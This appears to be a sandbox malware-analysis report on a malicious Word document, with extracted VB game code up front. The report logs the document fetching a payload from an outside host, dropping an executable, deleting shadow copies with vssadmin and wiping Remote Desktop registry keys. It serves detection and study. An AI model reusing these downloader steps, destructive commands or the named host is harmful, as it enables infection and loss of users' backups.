Public Function CheckRectsPlayerOpt() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(PlayerOptR)
If I > 1 Or Not Players(MeNum).Admin > 0 Then
If IntersectRect(rTemp, PlayerOptR(I), rMouse) Then
CheckRectsPlayerOpt = I + 1
Exit Function
End If
End If
If I = 1 And Not Players(MeNum).Admin > 0 Then Exit Function
Next
End Function
Public Sub DoOption()
Dim lMsg As Byte, j As Integer, b As Byte
Dim oNewMsg() As Byte, lNewOffSet As Long
'
If NavMenu = 3 Then
j = CheckRectsMenu3
If j = 1 Then PlayerScroll = PlayerScroll - 1
If j = 2 Then PlayerScroll = PlayerScroll + 1
If j > 3 Then PlayerSelected = j - 3
If PlayerScroll < 0 Then PlayerScroll = 0
If UBound(Players) > 10 Then
If PlayerScroll > UBound(Players) - 10 Then PlayerScroll = UBound(Players) - 10
Else
PlayerScroll = 0
End If
j = CheckRectsPlayerOpt
PlayerOpt = j
If j > 0 Then Exit Sub
End If
'
If MenuMenu = 1 Or (MenuMenu > 4 And MenuMenu < 9) Then
j = CheckRectsMenuMenu1
If j = 1 Then MenuMenu = 5
If j = 2 Then MenuMenu = 6
If j = 3 Then MenuMenu = 7
If j = 4 Then MenuMenu = 0
If j = 5 Then MenuMenu = 1
If j = 6 Then MenuMenu = 8
End If
'
If MenuMenu = 2 Then 'Team Switch
j = CheckRectsMenuMenu2
If j = 5 Then MenuMenu = 0
If j > HData.NumTeams Then Exit Sub
b = j
On Local Error Resume Next
lMsg = MSG_TEAM
lNewOffSet = 0
ReDim oNewMsg(0)
AddBufferData oNewMsg, VarPtr(lMsg), LenB(lMsg), lNewOffSet
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
SendTo oNewMsg
MenuMenu = 0
If j > 0 Then Exit Sub
End If
'
If MenuMenu = 3 Then 'Options
j = CheckRectsMenuMenu3
If j = 1 And Not gObjDSound Is Nothing Then If EnableSound Then EnableSound = False Else EnableSound = True
If j = 2 Then cfgm = True
If j = 3 Then cfgm = False
If j = 4 Then cfgk = True: KeyConfig False
If j = 5 Then cfgk = False: KeyConfig True
If j = 6 Then cfgwv = False
If j = 7 Then cfgwv = True
If j = 8 Then MenuMenu = 0
If j > 0 Then Exit Sub
End If
'
If MenuMenu = 4 Then 'Are you sure you want to leave ___ ?'
j = CheckRectsMenuMenu4
If j = 1 Then Stopping = True 'Yes'
If j = 2 Then MenuMenu = 0 'No'
If j > 0 Then Exit Sub 'What the?'
End If
'
If NavMenu = 4 Then
j = CheckRectsMenu4
If j > 0 Then MenuMenu = j: Exit Sub
End If
'
If MenuMenu = 9 Then If CheckRectMenu9 Then MenuMenu = 0
'
j = CheckRectsNav
If j = 1 Then If Not AnimateMenu Then MenuPend = 1: AnimateMenu = True
If j = 3 Then If Not AnimateMenu Then MenuPend = 3: AnimateMenu = True: PlayerSelected = 1
If j = 4 Then If Not AnimateMenu Then MenuPend = 4: AnimateMenu = True
If j = 5 Then DropFlag
If j = 6 Then Weapon = 1: SpecialSnd 1
If j = 7 Then Weapon = 2: SpecialSnd 2
If j = 8 Then Weapon = 3: SpecialSnd 3
If Advertisements Then If CheckRectsAd Then LaunchAd
End Sub
Public Sub sendmsg(cmd As Long, Msgs As String)
On Local Error Resume Next
Dim lMsg As Byte
Dim oNewMsg() As Byte, lNewOffSet As Long
lNewOffSet = 0
ReDim oNewMsg(0)
lMsg = cmd
AddBufferData oNewMsg, VarPtr(lMsg), LenB(lMsg), lNewOffSet
AddBufferString oNewMsg, Msgs, lNewOffSet
SendTo oNewMsg
End Sub
Public Sub GameChat(txt As String)
Dim X As Byte
For X = 0 To UBound(Chat)
If X = UBound(Chat) And Chat(X) <> vbNullString Then KillChatLine
If Chat(X) = vbNullString Then
If Chat(0) = vbNullString Then ChatClean = NewGTC
Chat(X) = txt
Exit For
End If
Next
WriteChat
End Sub
Public Sub KillChatLine()
Dim I As Integer
For I = 0 To UBound(Chat) - 1 Step 1
Chat(I) = Chat(I + 1)
Next
Chat(UBound(Chat)) = vbNullString
WriteChat
End Sub
Public Function GetPN(plr As String) As Integer
Dim I As Integer
For I = 1 To UBound(Players)
If LCase$(Players(I).Nick) = LCase$(plr) Then GetPN = I: Exit Function
Next
End Function
Public Sub AddIgnore(plr As String)
Dim I As Integer, j As Integer
j = GetPN(plr)
If Players(j).Admin > 0 Then
GameChat Chr$(5) & "You are not allowed to ignore this player."
Exit Sub
End If
For I = 0 To UBound(Ignored) + 1
If I > UBound(Ignored) Then ReDim Preserve Ignored(I)
If LenB(Ignored(I)) = 0 Then
Ignored(I) = LCase$(plr)
GameChat Chr$(5) & plr & " is ignored."
Exit For
End If
Next
End Sub
Public Function IsIgnored(plr As String) As Boolean
Dim I As Integer
For I = 0 To UBound(Ignored)
If Ignored(I) = LCase$(plr) Then
IsIgnored = True
Exit Function
End If
Next
End Function
Public Sub RemoveIgnore(plr As String)
Dim I As Integer
For I = 0 To UBound(Ignored)
If Ignored(I) = LCase$(plr) Then
Ignored(I) = vbNullString
GameChat Chr$(5) & plr & " is unignored."
Exit For
End If
Next
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
-
Normalized macro string: "e-snhv.com"
Normalized macro string: "hjbgtg67CHAStrominguatedrop.org"
Normalized macro string: "hjbgtg67CHASswangroup.net"
Normalized macro string: "Playe.rs"
Normalized macro string: "TileG.et"
Normalized macro string: "e-snhv.c\hjbgtg67CHAStringuatedrop.org\af\hjbgtg67CHASswangroup.net\hjbgtg67" - source
- File/Memory
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DFB6EDC21982DA276D.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DF5E07CE46EE67FB61.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFA4841D51F65BD667.TMP"
"WINWORD.EXE" created file "%TEMP%\fudziambl8"
"WINWORD.EXE" created file "%TEMP%\hurds8.exe"
"hurds8.exe" created file "%TEMP%\__t6D8E.tmp.bat"
"hurds8.exe" created file "%TEMP%\{e29ac6c0-7037-11de-816d-806e6f6e6963}" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_191"
"Local\WininetConnectionMutex"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"RasPbFile"
"Local\10MU_ACB10_S-1-5-5-0-58053"
"Local\ZoneAttributeCacheCounterMutex"
"Local\c:!users!lctgwmx!appdata!local!microsoft!windows!history!history.ie5!"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACBPIDS_S-1-5-5-0-58053"
"IESQMMUTEX_0_208"
"Local\ZonesLockedCacheCounterMutex"
"Local\c:!users!lctgwmx!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
"Local\WininetProxyRegistryMutex"
"Local\ZonesCacheCounterMutex"
"Local\c:!users!lctgwmx!appdata!roaming!microsoft!windows!cookies!"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"IESQMMUTEX_0_191"
"Local\WininetStartupMutex"
"Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-58053" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "__t6D8E.tmp.bat" as clean (type is "DOS batch file ASCII text with CRLF line terminators")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 5F890000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.CreateObject" ...
"WINWORD.EXE" called "WScript.Shell.1.CreateObject" ...
"WINWORD.EXE" called "ADODB.Stream.6.0.CreateObject" ...
"WINWORD.EXE" called "Shell.Application.1.CreateObject" ...
"WINWORD.EXE" called "WScript.Shell.1.Environment" with result: "IDispatch" ...
"WINWORD.EXE" called "WScript.Shell.1("Environment").Item" with result: "%TEMP%\ ..., "WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.open" ... , "WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.setRequestHeader" ... , "WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.send" ... , "WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.status" with result: "200" ..., "WINWORD.EXE" called "ADODB.Stream.6.0.Type" ... , "WINWORD.EXE" called "ADODB.Stream.6.0.Open" ... , "WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.responseBody" with result: "t+WmEBW1nxLrGCctuD3GzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE;4Wb7nYnKyj&/!0C+T5.H&R[9MQ2N779l!g%
[I>MkzhE35WbwRpk>`ag$HCctuD3GOzhE35Wb9qiWnEBWe+xLJqG8-uD3GOzhE5Tc2pgWnCW5~xLR+pGx`tu41GOkE35b9aiWnGBW0nyLRKrGMCbtuD3GOkE3%Wb9qiWlEB5nhLR[rGHCstuT3GOzhE#5Wb9qiWnEBW{LJrGH`tQC3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW{LJKrG`t)D3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wbl!1gnEBW5zLR[rGHCctu@3GOzhE35Wb9qiWEB`> }RKrGHbtu41GOBiE31Wb9qiWnEBW5nxLKrf1D3GOjhE3Tb9{iWnyCW5nxLRKrGHCct5D3OzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb9qiWnEBW5nxLRKrGHCctuD3GOzhvobl!1vcLL_X$$&M^;`tZn2GObkE;W#ri}R#F:+/KAirLdfW}H)BKTlo)c6uU7Jf_|jq('",S;q[x1Cva]I<:Xz1w,|AJTy8)h#o+Jvg'_{N;PTe]v.42lJa/nC&X#=K@~Kywz^7XsJSaGKOA$O1iL@FjK]*K%TgO>t6|DkHI[WXo]h4u[I4'xv!`n.'emr)e|4uPH2VE_JJ0vQl`l>p(sc+=LO=):$p,=(`<uIj$'H&
gC*PBLpyvIP@Kf*[p{Hg&+{65*9;&jb5.>+S80*Ip6>:%M+CI/|Sq= {z-L?D~GbN&y"eT>Y\TF/;[$-m\97m/*Me\JJ@%Zu 92p_U!h^aKpDK"{ykgT
/B{:?"26:>O0zB%l4yQ0D'77s6M0B@on%Z@+L$sy13R"
-M-A^L" ..., "WINWORD.EXE" called "ADODB.Stream.6.0.Write" ... , "WINWORD.EXE" called "ADODB.Stream.6.0.SaveToFile" ... , "WINWORD.EXE" called "Shell.Application.1.Open" ... - source
- API Call
- relevance
- 10/10
-
Opened the service control manager
- details
- "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source
- API Call
- relevance
- 10/10
-
Process launched with changed environment
- details
- Process "hurds8.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.9B0="4""
- source
- Monitored Target
- relevance
- 10/10
-
Requested access to a system service
- details
-
"WINWORD.EXE" called "OpenService" to access the "PcaSvc" service
"WINWORD.EXE" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"WINWORD.EXE" called "OpenService" to access the "RASMAN" service
"WINWORD.EXE" called "OpenService" to access the "rasman" service - source
- API Call
- relevance
- 10/10
-
Runs shell commands
- details
-
"cmd /c %TEMP%\__t6D8E.tmp.bat" on 2017-7-26.18:34:27.326
"cmd /c %TEMP%\__t773C.tmp.bat" on 2017-7-26.18:48:51.976
"cmd /c %TEMP%\tmp7751.tmp.bat" on 2017-7-26.18:48:51.996 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "hurds8.exe" (Show Process)
Spawned process "hurds8.exe" with commandline "-l" (Show Process)
Spawned process "hurds8.exe" (Show Process)
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t6D8E.tmp.bat" (Show Process)
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""" (Show Process)
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process)
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t773C.tmp.bat" (Show Process)
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\tmp7751.tmp.bat" (Show Process)
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""" (Show Process)
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"__t6D8E.tmp.bat" has type "DOS batch file ASCII text with CRLF line terminators"
"autoexec.bat" has type "data"
"AXE8SharedExpat.dll" has type "data"
"BazisVirtualCDBus.inf" has type "data"
"debugger.chm" has type "MPEG-4 LOAS"
"c2.dll" has type "data"
"AcroExt.exe" has type "data"
"c1.dll" has type "data"
"c1xx.dll" has type "data"
"BIB.dll" has type "data"
"CSS7DATA000A.DLL" has type "data"
"Application Verifier.lnk" has type "data"
"dH1rDN9f9.doc" has type "data"
"ASWhook.dll" has type "data"
"6SZfLTu9z.doc" has type "data"
"AutoItX.chm" has type "data"
"cvtres.exe" has type "data"
"1394dbg.cat" has type "data"
"Au3Check.exe" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\USER32.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "%WINDIR%\system32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F220924C-FB79-4399-B4C9-F5EF5A9228A1}.tmp"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\MSCTF.dll.mui" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "e-snhv.com"
Heuristic match: "hjbgtg67CHAStrominguatedrop.org"
Heuristic match: "hjbgtg67CHASswangroup.net"
Heuristic match: "Playe.rs"
Heuristic match: "TileG.et"
Heuristic match: "Microsoft.NET"
Pattern match: "u.cs/MeuN"
Pattern match: "http://www.adobe.com/go/reader_system_reqs_de.&JaFeature-Zustnde"
Pattern match: "kb2.adobe.com/cps/404/kb404946.htmlKBDOCLINK_ERROR_INVDRIVEReaderProcessPopupBrandNameMajorVerDefragResetProgressVirtuelles"
Heuristic match: "1zy}'F|g8J5y4QUq ptcZLCNS>q,h!Nl`_:y}<[Jd}UnK'f|4]37**5pz+vQ#YWLmzUR+9$hTB}n>h?N=qn7g5z,|k*$H5.BF"
Pattern match: "crl.microsoft.com/pki/crl/products/CSPCA.crl0H+"
Pattern match: "crl.microsoft.com/pki/crl/products/tspca.crl0H+"
Pattern match: "http://www.adobe.com/go/reader_system_reqs_de.PROGMSG_IIS_ROLLBACKWEBSERVICEEXTENSIONSCloseRestartRestartManagerOptionReadDEFAULT_VERB3UPDATE_UI_MODE120BLOCK_APP_TIMEOUTBLOCK_ENTRYPOINT_LOGGINGDiese"
Pattern match: "2.rB/v1nqN%5Eo"
Heuristic match: "TCiBYzRC'[R\ZnF|L=r6fuU\Dd>[S 2F.#RTa5C`>E.Zm"
Pattern match: "8ZX.pcaI/edma4"
Heuristic match: "V_[^SVW%UhthPtu]UuYuj6YjTYVgVVV-V-V+V^UVu3ut;ur^]U=pthp`.Yt"
Pattern match: "http://crl.verisign.com/tss-ca.crl0U%0"
Pattern match: "crl.verisign.com/ThawteTimestampingCA.crl0U%0"
Pattern match: "https://www.verisign.com/rpa"
Pattern match: "http://csc3-2010-crl.verisign.com/CSC3-2010.crl0DU"
Pattern match: "http://csc3-2010-aia.verisign.com/CSC3-2010.cer0U#0{&K&0`HB0"
Heuristic match: "_TV2Yg3n3UqLhza^ahZtoQtn8par-#8BM52o!,g+su{]]gu xDno~jOWT^os>{sOO sA_.Vi"
Heuristic match: "0qGveZ,+J}U&\Mc_6e.1rn6 /eNTMBT=R/'S=S'i;SFOV&BkINyb ps.n]v \R7(+9qa/pkI*x%: E,Wh9M D&D<T.th"
Heuristic match: "k;K0&g-@SzCi>w `4z-L+~~q\#gS:Tx--Aj1sC0Eg:`.aL"
Pattern match: "http://crl.thawte.com/ThawtePremiumServerCA.crl0U%0++0U0"
Pattern match: "http://crl.thawte.com/ThawteCodeSigningCA.crl0U%0+"
Pattern match: "www.macrovision.com0"
Heuristic match: "R%]$yh1vwapzp7P\JceK:5K#DY't:!!?Y<CoKQT79[l]wx{Hq)^+s|)1cy},]b#)= KN!%Gu%S~vNDY'|'.nR"
Heuristic match: "<OTk\dW9#CROt0zUzn-BXNu:vDVK9kcH-/xu/FY*dekvd<ydD'l+f_Y65?arkO]#c2M,|3*h.nR"
Pattern match: "DQ5m.QUC/@.K\C"
Pattern match: "GvHRI3.B.WWho/}e="
Heuristic match: "]?Cpf(>R}}??|7}gsa+$('G40=>oA^+0cm[ix&X0W-8y`u^+/sz{#2b=6c-f.?#u&{bm.bD"
Heuristic match: "!bin:V]u.va"
Pattern match: "b.ahQ/uQ|pBE]972"
Pattern match: "www.adobe.com/de"
Pattern match: "7KgDvx.pd/M{M;k0Z"
Pattern match: "d.Tid/TGh_J??6QZT7L"
Pattern match: "p.jWkj/fw8N4?HnGbCMa0A"
Pattern match: "yDXF..UKI/4n!/Z`esf;uA+;/Q%`I~'Ud3Qz*%4pXhLMwM*n7RuN" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e96033f4ef" to virtual address "0x764D4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "2c00000f" to virtual address "0x69E07FA4" (part of module "MSCONV97.DLL")
"WINWORD.EXE" wrote bytes "0c357047" to virtual address "0x6A26F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "ffff33db" to virtual address "0x69C7BE64" (part of module "WINSCARD.DLL")
"WINWORD.EXE" wrote bytes "c24f8f47" to virtual address "0x69EECA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "e92399f6ef" to virtual address "0x764D5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "85c0740e" to virtual address "0x69DEBE64" (part of module "USP10.DLL")
"WINWORD.EXE" wrote bytes "0e8b8db4" to virtual address "0x69DF7FA4" (part of module "USP10.DLL")
"WINWORD.EXE" wrote bytes "8d490200" to virtual address "0x69CA63DC" (part of module "WPFT632.CNV")
"WINWORD.EXE" wrote bytes "e99a54f3ef" to virtual address "0x764D3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "0f8b0b89" to virtual address "0x69CBBE64" (part of module "WPFT632.CNV")
"WINWORD.EXE" wrote bytes "a1bb2644" to virtual address "0x2FCB1B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "00000000" to virtual address "0x6BD525E0" (part of module "FM20ENU.DLL")
"WINWORD.EXE" wrote bytes "78636570" to virtual address "0x69E0BE64" (part of module "MSCONV97.DLL")
"WINWORD.EXE" wrote bytes "eb0c7147" to virtual address "0x699C10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "38d65747" to virtual address "0x66630BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "00000000" to virtual address "0x69E163DC" (part of module "MSCONV97.DLL")
"WINWORD.EXE" wrote bytes "0233db8b" to virtual address "0x69DFBE64" (part of module "USP10.DLL")
"WINWORD.EXE" wrote bytes "c4ca8e7780bb8e77aa6e8f779fbb8e7708bb8e7746ce8e7761388f77de2f8f77d0d98e77000000001779a2764f91a2767f6fa276f4f7a27611f7a276f283a276857ea27600000000" to virtual address "0x6BD81000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "99019901" to virtual address "0x69E316CC" (part of module "MSCONV97.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408") - source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
File Details
5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.docx.000
- Filename
- 5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.docx.000
- Size
- 52KiB (53180 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- 5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf
- MD5
- 6c7deb8280c4c27d3ba6bd86fae96eed
- SHA1
- 48094ad2feee6c795eec102fa89d33d381aa3b8a
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 17 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.doc
(PID: 2480)
-
hurds8.exe
(PID: 3492)
10/62
-
hurds8.exe
-l
(PID: 3448)
10/62
-
hurds8.exe
(PID: 3532)
10/62
-
cmd.exe
cmd /c %TEMP%\__t6D8E.tmp.bat
(PID: 3468)
- vssadmin.exe Delete Shadows /All /Quiet (PID: 1236)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f" (PID: 3680)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f" (PID: 3668)
- reg.exe "reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" (PID: 3720)
- attrib.exe attrib Default.rdp -s -h (PID: 3736)
-
cmd.exe
cmd /c %TEMP%\__t773C.tmp.bat
(PID: 884)
- vssadmin.exe Delete Shadows /All /Quiet (PID: 1940)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f" (PID: 3580)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f" (PID: 3576)
- reg.exe "reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" (PID: 3588)
- attrib.exe attrib Default.rdp -s -h (PID: 3572)
- cmd.exe cmd /c %TEMP%\tmp7751.tmp.bat (PID: 1092)
-
cmd.exe
cmd /c %TEMP%\__t6D8E.tmp.bat
(PID: 3468)
-
hurds8.exe
(PID: 3532)
10/62
-
hurds8.exe
-l
(PID: 3448)
10/62
-
hurds8.exe
(PID: 3492)
10/62
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
e-snhv.com
OSINT |
61.106.62.37 | INAMES CO., LTD. | Korea Republic of |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
61.106.62.37 |
80
TCP |
winword.exe PID: 2480 |
Korea Republic of |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
61.106.62.37:80 (e-snhv.com) | GET | e-snhv.com/hjbgtg67 | GET /hjbgtg67 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding: gzip, deflate
Host: e-snhv.com
Connection: Keep-Alive 200 OK More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 61.106.62.37:80 (TCP) | A Network Trojan was detected | ET TROJAN Known Malicious Doc Downloading Payload Dec 06 2016 | 2023583 |
Extracted Strings
Extracted Files
Displaying 90 extracted file(s). The remaining 1910 file(s) are available in the full version and XML/JSON reports.
-
Clean 1
-
-
__t6D8E.tmp.bat
- Size
- 445B (445 bytes)
- Type
- text
- Description
- DOS batch file, ASCII text, with CRLF line terminators
